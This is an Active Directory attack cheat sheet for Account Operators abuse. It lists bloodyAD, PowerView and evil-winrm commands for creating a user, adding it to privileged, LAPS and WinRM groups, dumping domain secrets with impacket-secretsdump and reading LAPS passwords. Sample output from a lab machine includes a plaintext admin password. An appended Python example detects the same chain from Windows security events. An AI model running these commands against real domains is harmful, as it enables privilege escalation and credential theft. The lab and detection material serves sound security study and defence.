TLDRBins / Account Operators

Create a New User Account and Add it to Privilege Group

1. Create a New User Account

# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add user '<NEW_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO

2. Add the New User to Privilege Group

# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output: TO-DO

# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output: TO-DO

# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output: TO-DO

# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output: TO-DO

# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' add groupMember '<GROUP>' '<NEW_USER>'
Sample Output: TO-DO

3. Secrets Dump

# Password
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>'
Sample Output: TO-DO

# NTLM
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH>
Sample Output: TO-DO

# Password-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>:<NEW_PASSWORD>@<TARGET>' -k
Sample Output: TO-DO

# NTLM-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -hashes :<HASH> -k
Sample Output: TO-DO

# Ticket-based Kerberos
impacket-secretsdump '<DOMAIN>/<NEW_USER>@<TARGET>' -k
Sample Output: TO-DO

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Create a New User Password Object

$new_user_password = ConvertTo-SecureString '<NEW_USER_PASSWORD>' -AsPlainText -Force
Sample Output: *Evil-WinRM* PS C:\programdata> $new_user_password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force

3. Create a New User Account

New-AdUser '<NEW_USER>' -enabled $true -accountpassword $new_user_password
Sample Output: *Evil-WinRM* PS C:\programdata> New-AdUser 'alice' -enabled $true -accountpassword $new_user_password

4. Add the New User to LAPS Group

Add-DomainGroupMember -Identity 'LAPS READ' -Members '<NEW_USER>'
Sample Output: *Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'LAPS READ' -Members 'alice'

5. Add the New User to WinRM Group

Add-DomainGroupMember -Identity 'WinRM' -Members '<NEW_USER>'
Sample Output: *Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity WinRM -Members 'alice'

6. Remote as New User

# Password
evil-winrm -i <TARGET> -u '<NEW_USER>' -p '<NEW_USER_PASSWORD>'
Sample Output:
$ evil-winrm -i 127.0.0.1 -u alice -p 'Test1234'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\alice\Documents>

# NTLM
evil-winrm -i <TARGET> -u '<NEW_USER>' -H '<NEW_HASH>'
Sample Output: TO-DO

# Ticket-based Kerberos
evil-winrm -i <TARGET> -r <DOMAIN>
Sample Output: TO-DO

7. Read LAPS Password

Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd
Sample Output:
*Evil-WinRM* PS C:\Users\alice\Documents> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd

DistinguishedName : CN=PIVOTAPI,OU=Domain Controllers,DC=LicorDeBellota,DC=htb
DNSHostName       : PivotAPI.LicorDeBellota.htb
Enabled           : True
ms-Mcs-AdmPwd     : 82SD67Cuq34TPZm4mnFo
Name              : PIVOTAPI
ObjectClass       : computer
ObjectGUID        : 98783674-e6a3-4d9e-87e3-efe5f31fabbf
SamAccountName    : PIVOTAPI$
SID               : S-1-5-21-842165252-2479896602-2762773115-1004
UserPrincipalName :
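Both chains on this page (bloodyAD steps 1-2 and PowerView steps 3-5) leave the same trail on the domain controller: a 4720 "user account created" event followed shortly by a 4728/4732/4756 "member added to group" event naming the new account. The following is an added detection example, not code from TLDRBins or any tool the page uses; the events are constructed, and the 30-minute window and the sensitive-group watch list are assumptions to tune per domain.

```python
"""Correlate 4720 (user created) with a group-add event for the same account.
Added example; constructed events, not real log data. Field names follow the
Security log's EventData names (SubjectUserName = actor, TargetUserName =
account or group, MemberName = DN of the added member)."""
from datetime import datetime, timedelta

USER_CREATED = 4720                 # A user account was created
MEMBER_ADDED = {4728, 4732, 4756}   # Member added to global/local/universal group
# Assumed watch list; replace with the groups that matter in your domain.
SENSITIVE_GROUPS = {"Administrators", "Domain Admins", "LAPS READ", "WinRM"}

SAMPLE_EVENTS = [  # constructed sample events
    {"EventID": 4720, "TimeCreated": "2024-05-01T10:00:00",
     "SubjectUserName": "bob", "TargetUserName": "alice"},
    {"EventID": 4728, "TimeCreated": "2024-05-01T10:00:07",
     "SubjectUserName": "bob", "TargetUserName": "LAPS READ",
     "MemberName": "CN=alice,CN=Users,DC=corp,DC=local"},
    {"EventID": 4720, "TimeCreated": "2024-05-01T11:00:00",
     "SubjectUserName": "hr-svc", "TargetUserName": "newhire"},
    {"EventID": 4728, "TimeCreated": "2024-05-02T09:00:00",
     "SubjectUserName": "hr-svc", "TargetUserName": "Staff",
     "MemberName": "CN=newhire,CN=Users,DC=corp,DC=local"},
]

def member_sam(member_dn):
    """Reduce 'CN=alice,CN=Users,...' to 'alice' (MemberName is a DN)."""
    rdn = member_dn.split(",", 1)[0]
    return rdn.split("=", 1)[1] if "=" in rdn else rdn

def find_abuse_chains(events, window=timedelta(minutes=30)):
    """One finding per account created and then added to a sensitive group
    within `window`; the creator and the adder need not be the same actor."""
    created = {}   # new account (lower-case) -> (creator, creation time)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == USER_CREATED:
            created[ev["TargetUserName"].lower()] = (ev["SubjectUserName"], ts)
        elif ev["EventID"] in MEMBER_ADDED:
            user = member_sam(ev["MemberName"]).lower()
            group = ev["TargetUserName"]
            if user in created and group in SENSITIVE_GROUPS:
                creator, t0 = created[user]
                if ts - t0 <= window:
                    findings.append({"creator": creator, "adder": ev["SubjectUserName"],
                                     "new_user": user, "group": group,
                                     "seconds": int((ts - t0).total_seconds())})
    return findings
```

A membership change for a brand-new account is rare in normal provisioning, so a low false-positive rate is expected; a 4662 read of ms-Mcs-AdmPwd by the same account would be the natural follow-on rule for step 7.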